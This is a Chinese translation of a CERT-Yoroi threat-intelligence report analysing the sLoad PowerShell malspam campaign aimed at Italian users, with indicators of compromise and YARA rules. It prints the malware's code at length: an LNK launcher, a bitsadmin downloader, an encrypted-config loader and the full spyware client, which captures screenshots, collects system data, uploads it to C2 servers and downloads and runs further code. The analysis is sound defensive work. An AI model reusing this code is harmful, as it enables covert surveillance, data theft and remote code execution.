SLoad Powershell malspam正在蔓延到意大利

一、介绍

在过去的几个月里，CERT-Yoroi观察到一种新兴攻击模式。一系列恶意电子邮件共享通用技术，这些技术可能与一个威胁组织对意大利网络全面的攻击有关。目前尚不清楚这些攻击尝试是由一个完善的网络犯罪组织修改其TTP所致，还是全新的攻击尝试。但CERT-Yoroi正在通过内部代号“Sload-ITA”（TH-163）来跟踪此威胁。去年五月， SANS ICS 研究人员在英国也记录了类似的操作行为。恶意行动通过滥用基于压缩存档中的代码隐藏技术和类似的drop-url模式共享相同的drop mode：

· 2018-10-08 – 使用“/AE-9455933DGW-nota-cliente” url 模式

· 2018-10-09 – 使用“/fattura-per-cliente-QN-OAYSAPV” url 模式

· 2018-10-15 –使用“/MA-47462780Y3-documento-cliente” url 模式

· 某些恶意邮件已从“PEC”邮箱发送

·2018-11-19 – 使用 “/documento-aggiornato-novembre-ER16909FP9”

· CERT-PA 追踪

Yoroi-Cybaze ZLAB收集并解析了在响应操作期间恢复的样本，用来揭示这些攻击者使用的恶意植入程序的细节。下图总结了sLoad恶意软件感染的步骤。

图1. SLoad感染流程

二、技术分析

分析的恶意样本是压缩zip存档，包含两个不同文件：

1. 一个假装指向系统文件夹的链接，名为“invio fattura elettronica.lnk”

2. 一个隐藏的JPEG图像“image _20181119_100714_40.jpg”，该文件存储为HA属性。

尽管从存档中提取的LNK文件表面上看很无辜，但它的武器化方式与APT29在其最新操作期间采用的方式类似，表明该技术是几种恶意网络武器的一部分。实际上，当用户双击文件时，批处理脚本会生成下面的powershell脚本：

C:\Windows\System32\cmd.exe /C powershell.exe -nop -eP ByPass -win hi"d"den -c "&{$9oc=get-childItem -path c:\users\* -recurse -force -include documento-aggiornato-novembre-*.zip;$g3u=get-content -LiteralPat $9oc.fullname;$g3u[$g3u.length-1]|iex}"

PS脚本搜索与模式“documento-aggiornato-novembre – * .zip”匹配的任何文件：如果文件存在，则脚本在其末尾提取一部分代码，然后通过“IEX”调用它;我们检查了zip文件并恢复了这部分代码。在下图中，可以看到附件存档内容分为粉红色和黄色，外来代码为蓝色。

图2.添加到Zip存档的代码

该部分文件包含powershell脚本调用的可执行代码。由于调用了“bitsadmin.exe”，此代码能够从“firetechnicaladvisor.com”下载其他脚本，然后将所有这些新下载的文件存储在“％APPDATA％/ <UUID>”文件夹中。下图显示了下载恶意植入程序后文件夹的内容：

图3.恶意植入程序的组件

下面的片段显示了负责下载这些恶意软件的代码。

$env_appData=$env:appdata;
$cmd='cmd';
$gen_random_value_name_ps= -join ((65..90) + (97..122) | Get-Random -count 14 | % {[char]$_});
$get_uuid=(Get-WmiObject Win32_computerSystemProduct).UUid;
$set_hidden='hidden';
$folder_to_store_file = $env_appData+'\'+$get_uuid;
$h=$folder_to_store_file+'\d';  
   if(!(test-path $folder_to_store_file)){
   New-item -itemtype directory -Force -path $folder_to_store_file;
   };
$ps_to_download_and_execute='/c echo 1 > '+$h+'  & bitsadmin /wrap /transfer fredikasledi /download /priority FOReGrOUnd "https://firetechnicaladvisor.com/globa/monu" '+$folder_to_store_file+'\'+$gen_random_value_name_ps+'.ps1 & del '+$h+' & exit';
start-process -wiNdowstyLe $set_hidden $cmd $ps_to_download_and_execute;
$e=1;
Start-Sleep -s 6;
$p2='powe';
while($e -eq 1){
   if(test-path $h)
   Start-Sleep -s 3
   }else{
   $e=2
   }
};
Start-Sleep -s 7;
$p1='ell';
$ps_to_download_and_execute='/c '+$p2+'rsh'+$p1+' -nop -ep bypass -File '+$folder_to_store_file+'\'+$gen_random_value_name_ps+'.ps1 & exit';
start-process -wiNdowstyLe $set_hidden $cmd $ps_to_download_and_execute;

NxPgKLnYEhMjXT.ps1脚本安装并植入受害者的机器，在系统上注册计划任务，以确保感染持续存在。然后，该脚本会自删除。

图4.恶意植入程序的安装脚本

在快速查看CxeLtfwc.ps1脚本之后，我们还注意到恶意软件使用cmdlet“Invoke-Expression”从“config.ini”文件加载并运行另一段代码。

param ([string]$k = "");
$random_name_of_powershell=Get-Process -name powershell*;
if ($random_name_of_powershell.length -lt 2){
   $folder_name = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
   $log = $env:APPDATA+"\"+$folder_name;
   $key=$k -split "," ;
   $Secure= Get-Content $log"\config.ini";
   $Encrypted= ConvertTo-SecureString $Secure -key $key;
   $encrypted_string = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted);
   $expression_to_execute = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($encrypted_string);
   Invoke-Expression $expression_to_execute;
}

下图显示了恶意植入程序的其他组件如何调用此特定代码：可以注意到脚本是使用输入参数（“1,2,3,4,5,6,7,8， 9,10,11,12,13,14,15,16“）启动的，该参数作为密钥来解密”config.ini“的内容：恶意软件的真实有效载荷。

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden -ep bypass -File C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\CxeLtfwc.ps1 -k 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
--------------
C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\<NOME_CASUALE>.vbs" 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
--------------
Dim objWmi, colItems, objItem, strUUID, blnValidUUID,oShell
Set objWmi = GetObject("winmgmts:\\" & "." & "\root\cimv2")
Set colItems = objWmi.ExecQuery("Select * from Win32_ComputerSystemProduct")
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "power"+"shel"+"l.exe -win hi"+"dden -ep by"+"pass -Fi"+"le C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\WpaejPkv.ps1 -k "& WScript.Arguments(0),0,True
Set oShell = Nothing

“config.ini”和“web.ini”文件都在运行时通过以下一组系统命令来进行解密和调用：

“ConvertTo-SecureString”, 
[System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted);
[System.Runtime.InteropServices.Marshal]::PtrToStringAuto($slStr);

下图显示了“config.ini”文件加密后代码的一部分，之后是其解密的代码。

图5.“config.ini”中的加密有效载荷

这是恶意客户端的源代码：

$runDMC = "cmd";
<a href="/cdn-cgi/l/email-protection" data-cfemail="8bafe0eef2b6cb">[email protected]</a>(1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16)
$morty=$env:APPDATA;
function Get-ScreenCapture{
Param(
[Parameter()]
[Alias("Path")]
[string]$Directory = ".",
[Parameter()]
[ValidateRange(70,100)]
[int]$Quality,
[Parameter()]
[Switch]$AllScreens
)        
    Set-StrictMode -Version 2
    Add-Type -AssemblyName System.Windows.Forms
    if ($AllScreens){
     $Capture = [System.Windows.Forms.Screen]::AllScreens
    }else{
     $Capture = [System.Windows.Forms.Screen]::PrimaryScreen
    }
    foreach ($C in $Capture){
     $screenCapturePathBase = $path+"\ScreenCapture"
     $cc = 0
     while (Test-Path "${screenCapturePathBase}${cc}.jpg") {
         $cc++
     }
     $FileName="${screenCapturePathBase}${cc}.jpg"    
     $Bitmap = New-Object System.Drawing.Bitmap($C.Bounds.Width, $C.Bounds.Height)
     $G = [System.Drawing.Graphics]::FromImage($Bitmap)
     $G.CopyFromScreen($C.Bounds.Location, (New-Object System.Drawing.Point(0,0)), $C.Bounds.Size)
     $g.Dispose()
     $Quality=70;
     $EncoderParam = [System.Drawing.Imaging.Encoder]::Quality
     $EncoderParamSet = New-Object System.Drawing.Imaging.EncoderParameters(1)
     $EncoderParamSet.Param[0] = New-Object System.Drawing.Imaging.EncoderParameter($EncoderParam, $Quality)
     $JPGCodec = [System.Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where{$_.MimeType -eq 'image/jpeg'}
     $Bitmap.Save($FileName ,$JPGCodec, $EncoderParamSet)
    }
}
$productID = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
$path = $morty+"\"+$productID;
$btlog=$path+'\btc.log'
$pp=$path+'\'+$productID;
try{ If(test-path $pp"_0"){ Remove-Item $pp"_*";}}catch{}
try{ If(test-path $pp){Remove-Item $pp;}}catch{}
$ldf='/C bitsadmin /reset';    
start-process -wiNdowStylE HiDden $runDMC $ldf;
$Secure= Get-Content $path"\web.ini";
$Encrypted= ConvertTo-SecureString $Secure -key $key;
$slStr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted);
$rStr = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($slStr);
$d=$rStr -split ","
For ($i=0; $i -le $d.Length-1; $i++){
    if ($d[$i] -match "http"){
     $rp= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})      
     $ldf='/C bitsadmin /transfer '+$rp+' /download /priority normal "'+$d[$i]+'/captcha.php?ch=1" '+$path+'\'+$productID+'_'+$i;    
     start-process -wiNdowStylE HiDden $runDMC $ldf;    
    }
}
$e=1;$dd=0;
while($e -eq 1){
    $ad=2;
    For ($i=0; $i -le $d.Length-1; $i++){        
     $pp=$path+'\'+$productID+'_'+$i;
     if([System.IO.File]::Exists($pp)){
         $line=Get-Content $pp
         if ($line -eq "sok"){ $did=$i;}
         $ad=1;
     }           
    }
    $dd++;
    if ($dd -gt 60) {
     $outU="";
     For ($i=0; $i -le $d.Length-1; $i++){
         if ($d[$i] -match "http"){
             $l=$d[$i].split(".")[0] -replace "[^0-9]" , '';
             $p=$d[$i].split(".")[1] -replace "[^A-Z/]" , '';        
             $n=[int]$l+1;
             $r1=$l+'.'+$p;
             if ($n -gt 50){ $n=1;}
             $r2=[string]$n+'.'+$p;              
             $outU+=$d[$i]+"," -replace $r1, $r2
         }
     }
     $Secure = ConvertTo-SecureString $outU -AsPlainText -Force
     $Encrypted = ConvertFrom-SecureString -SecureString $Secure -key $key
     $Encrypted | out-file $path"\web.ini";      
     stop-process -name powershell*
    }
    if ($ad -eq 1){ $e=2;}    
    Start-Sleep -s 3
}
$rp= -join ((65..90) + (97..122) | Get-Random -Count 12 | % {[char]$_})
$ldf='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND "'+$d[$did]+'new/u.jpg" "'+$path+'\web.ini" & exit ';
$ldf | out-file $path'\asd'
start-process -wiNdowStylE HiDden $runDMC $ldf;
    
    
$outD="";
$dd=Get-WmiObject -Class Win32_LogicalDisk | Where-Object {$_.Description -match 'Network'} | Select-Object ProviderName,DeviceID;
try{ if ($dd ){for ($i=0; $i -le $dd.length; $i++){$outD=$outD+'{'+$dd[$i].DeviceID+''+$dd[$i].ProviderName+'}';}} }catch {}
try{ if ($dd -and $outD -eq "" ){$outD='{'+$dd[$i].DeviceID+''+$dd.ProviderName+'}';}}catch {}
try{
$nw=$path+'\_nw';
$nr=$path+'\_nr';
$rf='/C net view  > '+$nw+' & copy '+$nw+' '+$nr+' & exit';
start-process -wiNdowStylE HiDden cmd $rf;    
$e=1;while($e -eq 1){If(test-path $nr){$e=3;}Start-Sleep -s 3;}
$l=get-content $nr;
$gk=$l -match '\\';
if ($gk -and $gk.length -gt 1){ $outD=$outD+'{in network:'+$gk.length+'}'; }
remove-item $nr }catch{}
$cp=Get-WmiObject  win32_processor | select Name;
try{ if ($cp.length -gt 0){ $cpu=$cp[0].Name }else{$cpu=$cp.Name} }catch {}
try{$v1=(gwmi win32_operatingsystem).caption }catch {}
try{ Remove-Item $path"\*.jpg";}catch{}
try{
    if([System.IO.File]::Exists($path+"\f.ini")){
     $ci=Get-Content $path"\f.ini";
    }else{
     $ci=0;
     for ($i=0;$i -le 3;$i++){
         Get-ScreenCapture;
         Start-Sleep -s 40;
     }
     $cit=Get-ChildItem -Path c:\users -Filter *.ICA -Recurse -ErrorAction SilentlyContinue -Force
     if ($cit){ $ci=1; }    
     $ci | Out-File $path"\f.ini"
    }
}catch{}
if (test-path $path"\..\Microsoft\Outlook\"){$ot=1;}else{$ot=0;}
try {$lnk=([System.Uri]$d[$did]).Host}catch{}
$s=0;
while($true){
    $out="";
    $tt=Get-Process  | Select-Object name
    for ($i=0; $i -le $tt.length-1; $i++){
     $out=$out+"*"+$tt[$i].Name;
    }
    
    $rp= -join ((65..90) + (97..122) | Get-Random -Count 12 | % {[char]$_})
    $ldf='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND "'+$d[$did]+'captcha.php?lnk='+$lnk+'&s='+$s+'&g=pu&c='+$ci+'&id='+$productID+'&v='+$v1+'&c='+$rp+'&a='+$out+'&d='+$outD+'&n='+$env:ComputerName+'&cpu='+$cpu+'&o='+$ot+'" '+$path+'\'+$productID+' > '+$btlog+' & exit ';
    start-process -wiNdowStylE HiDden $runDMC $ldf;
    Start-Sleep -s 120;
    $pp=$path+'\'+$productID;
    if([System.IO.File]::Exists($pp)){
     $line=Get-Content $pp;
     if ($line -match "run="){
         $u=$line -replace 'run=','';
         $ldf="/C powershell.exe  -command iex ((nEw-ObJect ('NEt.WeBclient')).('DowNLoAdStrInG').invoKe(('"+$u+"')))";
         start-process -wiNdowStylE HiDden $runDMC $ldf;    
     }elseif ($line.length -gt 3){
         try{ Remove-Item $path"\*.jpg";}catch{}
         $dPath = [Environment]::GetFolderPath("MyDocuments")
         $rp= -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})
         $ldf='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND '+$line+' '+$path+'\'+$productID+'_'+$rp+'.txt & Copy /Z '+$path+'\'+$productID+'_'+$rp+'.txt '+$path+'\'+$productID+'_'+$rp+'_1.txt & certutil -decode '+$path+'\'+$productID+'_'+$rp+'_1.txt '+$dPath+'\'+$productID+'_'+$rp+'.exe & powershell -command "start-process '+$dPath+'\'+$productID+'_'+$rp+'.exe" & bitsadmin /transfer '+$rp+'s /download /priority normal "'+$d[$did]+'gate.php?n='+$env:ComputerName+'&ts=1&id='+$productID+'&c='+$rp+'" '+$path+'\'+$productID+'_'+$rp+'.txt & exit';
         start-process -wiNdowStylE HiDden $runDMC $ldf;
         for ($i=0;$i -le 5;$i++){
             Get-ScreenCapture;
             Start-Sleep -s 40;
         }
         $ldf='/C del '+$path+'\'+$productID+'_'+$rp+'.txt & del '+$path+'\'+$productID+'_'+$rp+'_1.txt & del '+$dPath+'\'+$productID+'_'+$rp+'.exe & exit';
         start-process -wiNdowStylE HiDden $runDMC $ldf;
     }
    }
    
    for ($i=0; $i -le 5; $i++){
     $scr=$path+"\ScreenCapture"+$i+".jpg"
     if([System.IO.File]::Exists($scr)){
         $rur= -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_});           
         $rf='/C bitsadmin /transfer '+$rur+' /upload /priority FOREGROUND "'+$d[$did]+'p.php?n='+$env:ComputerName+'&id='+$productID+'&i='+$i+'&s='+$rur+'" "'+$scr+'" & del "'+$scr+'" & exit';
         start-process -wiNdowStylE HiDden $runDMC $rf;
     }
    }
    if([System.IO.File]::Exists($btlog)){
     $e=0;
     foreach($line in Get-Content $btlog -Encoding UTF8) {
         if ($line -match "ERROR"){ $e++; }
     }
     if ($e -gt 0 ){
         $rf='/C bitsadmin /reset & exit';
         start-process -wiNdowStylE HiDden $runDMC $rf;          
         stop-process -name powershell*
     }
    }
    Start-Sleep -s 1200;
    $s++;
}

解密“web.ini”的内容会显示恶意植入程序使用的C2的远程地址：https：//hamofgri.me/images/,https://ljfumm.me/images/

恶意客户端收集有关受害者计算机的信息，例如：domain，dns cache，running processes，ip和system architecture。此外，它会定期捕获受害者当前桌面的屏幕截图，搜索Microsoft Outlook文件夹并收集用户目录中是否存在“* .ICA”Citrix文件信息。所有这些信息都被发送到命令和控制服务器。提交数据后，它会直接从攻击者那里收到更多的PowerShell代码。此行为是特洛伊木马/间谍软件恶意软件的特征，通常用作重建受感染主机的桥头堡，甚至成为某些更复杂攻击的初始阶段。

图6. VT 给Sload 恶意组件评分

三、总结

最近由第三方安全公司和政府CERT报告的sLoad攻击浪潮对意大利的网络构成了重大威胁，因为攻击者准备了精心设计的钓鱼邮件主题，并且在恶意软件植入时使用的技术和方法检测率很低。

目前尚不清楚这些攻击背后的组织是否是网络犯罪中的全新成员。最初的恶意行动是在2018年5月发现的，针对的是英国用户。而最近针对意大利用户的活动始于去年10月，表明该组织的恶意活动有所扩大。

CERT-Yoroi目前正在跟踪意大利地区的TH-163，ZLAB团队不断分析其部件、恶意软件植入程序和技术，以确保对我们国家的保护。

IoC

恶意urls:

·https://upabovenewyork[.com/.fatturazione/fattura-per-cliente-QN-OAYSAPV

·https://sciencefictionforgirls.[com/cience/ionfo

· upabovenewyork[.com

·91.218.127.[180

·sciencefictionforgirls[.com

· 185.17.27[.100

·https://rootcellarproductions.[com/documento/AE-9455933DGW-nota-cliente

· https://peatsenglishcider.[com/seng/ishci

·rootcellarproductions[.com

·91.218.127.[183

·peatsenglishcider.[com

· 185.17.27[.100

· https://three-bottles[.com/area-riservata/MA-47462780Y3-documento-cliente

· https://icodeucode.[com/col/euco

· three-bottles[.com

·91.218.127.[183

·firetechnicaladvisor.[com

· 185.17.27.[108

· https://cavintageclothing[.com/update/b746yrthdfb.txt 

·cavintageclothing.[com 

· 185.17.27[.108

·bureaucratica[.org

· 18.13.7[.20

C2 (sload):

·https://balkher.[eu/doc/p2.txt

· https://balkher.[eu/sload/2.0/hostp1.txt

·https://balkher[.eu/sload//img.php?ch=1

·balkher[.eu

·185.197.75[.241

· https://perecwarrio[.eu/sload/

· perecwarrior[.eu

· 185.211.246[.50

· https://ljfumm[.me/images/gate.php

· https://hamofgri.[me/images/gate.php

·https://hamofgri.[me/images/captcha.php?ch=1

·https://ljfumm[.me/images/captcha.php?ch=1

·ljfumm[.me

· hamofgri[.me

·185.197.75[.10

持久性:

·%APPDATA%\<GUID>

Hash:

·b702e8e23165273f8e90615ce4af2f158048bf6b615f545b992fbbb62f7eff27 zip

· 1cbe16ac066aeac78c2f3e41e2afa3433833bf6f65131bcfbf88db97e9b94efb jpg

·d8f4ae0477f7e2931e89e4b6d3e78556d3b5765a2c08bc3bdec8c1f6dc0904c0 lnk

· ed1007884730a664f9cc827fb60924079149a2fec08ca91c2342c368e727c330 zip

·3b5b6cd6ecef252624ee3b5c80d27647766527920b76ebc533f9bc336bfe91ad jpg

· 0a392ded18578069c647383492253f990210b9c9f9293a6ded09eab7e0936562 jpg

·b19794f283f9c09f997cbfcbec8c30a5e48eb520ee7bcabd0d62c7b527105f42 lnk

· 3866a58fe3d459173a28bfdee3ec7a90d7551761121fba9eda3685a268cdeda5  ps1

·ed99528a9e818fb486e468d9744745fcfd7157cc8e18181dce7404483c12e834 zip

·97f9bb29083458c88844a2cecca272a22cac8cf7960b76c3fa46e891eeb18236 lnk

·444e29050bbe68484e33f4e30dbe165186f93884e3336643cfb965156141c5ae jpg

· 6a49ed883ed266682ec275a395e0d7c6489ded6a6d7072e84af696e82f3b49a3 ps1

·f94ebce29158af5f4df34e5af428a514faeef20de08418ad0153ad2a9a07cea0 ps1

·daadae8672c31474047f21008ec131cf6a102dac7ca8b8c6df89d35bdf2246da vbs

· ee1dbf76665f5c07ba1c453d1890aa93307f759c5cce6f59f225111509482a64 ps1

·062cc76eeb34d1d3bb5467836cd2d33cb973fc0a8129947af074675beb1fbf1f ini

· df1cb74942fe9d0897431752c2d9717190aa38f79834e22aa885ec8881134505

Yara规则

rule image_20181119_100714_50_jpg{
    meta:
      description = "Yara Rule for Trojan/sLoad"
      author = "Cybaze Zlab_Yoroi"
      last_updated = "2018-11-21"
      tlp = "white"
      category = "informational"
    strings:
        $a1 = "Adobe Photoshop"
 $a2 = {3A 30 33 3A 32 38}
 $a3 = {FF D8 FF E0}
 $b = {B4 30 B8 B? ?? ?? ?? BA AD E3 ?? ?? C7 7F 84 6A 09 74 9F 75}
 
    condition:
        $a1 and $a2 and $a3 or $b
}
rule documento_aggiornato_novembre_ER16909FP9_zip{
    meta:
      description = "Yara Rule for Trojan/sLoad"
      author = "Cybaze Zlab_Yoroi"
      last_updated = "2018-11-21"
      tlp = "white"
      category = "informational"
    strings:
        $a1 = "https://firetechnicaladvisor.com/"
 $a2 = {24 34 4D 61 30 58 32 6C 49 7A}
 $a3 = "image_20181119_100714_40.jpg"
 $a4 = "invio fattura elettronica.lnk"
 $a5 = {2B 27 2E 70 73 31}
 $b = {50 4B}
 
    condition:
        1 of ($a*) and $b
}
rule _ini_files{
    meta:
      description = "Yara Rule for Trojan/sLoad"
      author = "Cybaze Zlab_Yoroi"
      last_updated = "2018-11-21"
      tlp = "white"
      category = "informational"
    strings:
    $a1 = "DkAYQBjADcANAA3ADUAMwBkADAA"
 $a2 = "ADMAMgA5AGUAYgA3AGYAM"
    condition:
        $a1 or $a2
}
rule invio_fattura_elettronica_lnk{
    meta:
      description = "Yara Rule for Trojan/sLoad"
      author = "Cybaze Zlab_Yoroi"
      last_updated = "2018-11-21"
      tlp = "white"
      category = "informational"
    strings:
        $a1 = {63 00 3A 00 5C 00 75 00 73 00 65 00 72 00 73 00 5C 00 2A}
 $a2 = {4D 5A 35 10 00 53 79 73 74 65 6D 33 32}
 $b = {4C ??}
 $c = {63 6D 64 2E 65 78 65}
 $d = "i.e.x."
 
    condition:
        1 of ($a*) and $b and $c and $d
}